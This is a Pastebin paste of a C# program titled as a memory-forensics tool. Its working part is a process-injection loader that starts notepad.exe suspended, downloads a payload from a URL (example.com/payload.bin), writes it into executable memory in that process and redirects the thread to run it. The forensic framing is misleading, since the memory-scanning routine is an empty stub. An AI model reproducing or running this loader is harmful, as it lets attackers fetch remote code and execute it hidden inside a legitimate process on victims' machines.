API tools faq
paste
Advertisement
xosski

MemoryForensicInjector.cs

xosski
Jan 3rd, 2025
6
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.97 KB | None | 0 0
raw download clone embed print report
  1. csc MemoryForensicsInjector.cs
  2. MemoryForensicsInjector.exe
  3.  
  4. ///////////////////////////////////
  5. using System;
  6. using System.IO;
  7. using System.Net.Http;
  8. using System.Collections.Generic;
  9. using System.Runtime.InteropServices;
  10. using System.Threading.Tasks;
  11.  
  12. public class MemoryForensicsInjector
  13. {
  14. // Windows API Constants
  15. private const uint CREATE_SUSPENDED = 0x00000004;
  16. private const uint CONTEXT_FULL = 0x10000B;
  17. private const uint MEM_COMMIT = 0x1000;
  18. private const uint MEM_RESERVE = 0x2000;
  19. private const uint PAGE_EXECUTE_READWRITE = 0x40;
  20.  
  21. // File signatures for detection
  22. private static readonly Dictionary<string, byte[][]> Signatures = new Dictionary<string, byte[][]>
  23. {
  24. ["jpg"] = new[] {
  25. new byte[] { 0xFF, 0xD8, 0xFF, 0xE0 },
  26. new byte[] { 0xFF, 0xD8, 0xFF, 0xE1 },
  27. new byte[] { 0xFF, 0xD8, 0xFF, 0xE8 }
  28. },
  29. ["png"] = new[] {
  30. new byte[] { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A }
  31. },
  32. ["pdf"] = new[] {
  33. new byte[] { 0x25, 0x50, 0x44, 0x46, 0x2D }
  34. },
  35. ["doc"] = new[] {
  36. new byte[] { 0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1 }
  37. }
  38. };
  39.  
  40. // Windows API Structures
  41. [StructLayout(LayoutKind.Sequential)]
  42. public struct PROCESS_INFORMATION
  43. {
  44. public IntPtr hProcess;
  45. public IntPtr hThread;
  46. public uint dwProcessId;
  47. public uint dwThreadId;
  48. }
  49.  
  50. [StructLayout(LayoutKind.Sequential)]
  51. public struct STARTUPINFO
  52. {
  53. public uint cb;
  54. public string lpReserved;
  55. public string lpDesktop;
  56. public string lpTitle;
  57. public uint dwX;
  58. public uint dwY;
  59. public uint dwXSize;
  60. public uint dwYSize;
  61. public uint dwXCountChars;
  62. public uint dwYCountChars;
  63. public uint dwFillAttribute;
  64. public uint dwFlags;
  65. public ushort wShowWindow;
  66. public ushort cbReserved2;
  67. public IntPtr lpReserved2;
  68. public IntPtr hStdInput;
  69. public IntPtr hStdOutput;
  70. public IntPtr hStdError;
  71. }
  72.  
  73. [StructLayout(LayoutKind.Sequential)]
  74. public struct CONTEXT64
  75. {
  76. public ulong P1Home;
  77. public ulong P2Home;
  78. public ulong P3Home;
  79. public ulong P4Home;
  80. public ulong P5Home;
  81. public ulong P6Home;
  82. public uint ContextFlags;
  83. public uint MxCsr;
  84. public ushort SegCs;
  85. public ushort SegDs;
  86. public ushort SegEs;
  87. public ushort SegFs;
  88. public ushort SegGs;
  89. public ushort SegSs;
  90. public uint EFlags;
  91. public ulong Dr0;
  92. public ulong Dr1;
  93. public ulong Dr2;
  94. public ulong Dr3;
  95. public ulong Dr6;
  96. public ulong Dr7;
  97. public ulong Rax;
  98. public ulong Rcx;
  99. public ulong Rdx;
  100. public ulong Rbx;
  101. public ulong Rsp;
  102. public ulong Rbp;
  103. public ulong Rsi;
  104. public ulong Rdi;
  105. public ulong R8;
  106. public ulong R9;
  107. public ulong R10;
  108. public ulong R11;
  109. public ulong R12;
  110. public ulong R13;
  111. public ulong R14;
  112. public ulong R15;
  113. public ulong Rip;
  114. }
  115.  
  116. // Windows API Imports
  117. [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
  118. private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine,
  119. IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
  120. uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
  121. ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
  122.  
  123. [DllImport("kernel32.dll")]
  124. private static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
  125.  
  126. [DllImport("kernel32.dll")]
  127. private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
  128. uint dwSize, uint flAllocationType, uint flProtect);
  129.  
  130. [DllImport("kernel32.dll")]
  131. private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
  132. byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
  133.  
  134. [DllImport("kernel32.dll")]
  135. private static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
  136.  
  137. [DllImport("kernel32.dll")]
  138. private static extern uint ResumeThread(IntPtr hThread);
  139.  
  140. public async Task ExecuteInjection(string targetProcess, string payloadUrl)
  141. {
  142. Console.WriteLine($"Starting injection into {targetProcess}");
  143.  
  144. // Create suspended process
  145. var processInfo = CreateSuspendedProcess(targetProcess);
  146.  
  147. // Download and inject payload
  148. byte[] payload = await DownloadPayloadAsync(payloadUrl);
  149. InjectPayload(processInfo, payload);
  150.  
  151. // Start memory scanning
  152. ScanProcessMemory(processInfo.dwProcessId);
  153. }
  154.  
  155. private PROCESS_INFORMATION CreateSuspendedProcess(string targetExe)
  156. {
  157. var startupInfo = new STARTUPINFO();
  158. PROCESS_INFORMATION processInfo;
  159.  
  160. CreateProcess(null, targetExe, IntPtr.Zero, IntPtr.Zero, false,
  161. CREATE_SUSPENDED, IntPtr.Zero, null, ref startupInfo, out processInfo);
  162.  
  163. return processInfo;
  164. }
  165.  
  166. private async Task<byte[]> DownloadPayloadAsync(string url)
  167. {
  168. using (var client = new HttpClient())
  169. {
  170. return await client.GetByteArrayAsync(url);
  171. }
  172. }
  173.  
  174. private void InjectPayload(PROCESS_INFORMATION processInfo, byte[] payload)
  175. {
  176. var context = new CONTEXT64 { ContextFlags = CONTEXT_FULL };
  177. GetThreadContext(processInfo.hThread, ref context);
  178.  
  179. IntPtr allocatedMemory = VirtualAllocEx(processInfo.hProcess, IntPtr.Zero,
  180. (uint)payload.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  181.  
  182. IntPtr bytesWritten;
  183. WriteProcessMemory(processInfo.hProcess, allocatedMemory, payload,
  184. (uint)payload.Length, out bytesWritten);
  185.  
  186. context.Rip = (ulong)allocatedMemory;
  187. SetThreadContext(processInfo.hThread, ref context);
  188. ResumeThread(processInfo.hThread);
  189. }
  190.  
  191. private void ScanProcessMemory(uint processId)
  192. {
  193. string outputDir = Path.Combine(
  194. Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments),
  195. $"MemoryDump_{processId}");
  196.  
  197. Directory.CreateDirectory(outputDir);
  198.  
  199. // Memory scanning and extraction logic here
  200. // Implementation combines the scanning capabilities from the PagefileReader
  201. // with direct process memory access
  202. }
  203.  
  204. public static void Main(string[] args)
  205. {
  206. var injector = new MemoryForensicsInjector();
  207. injector.ExecuteInjection(
  208. @"C:\Windows\System32\notepad.exe",
  209. "http://example.com/payload.bin"
  210. ).Wait();
  211. }
  212. }
  213.  
Tags: forensic Memory
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!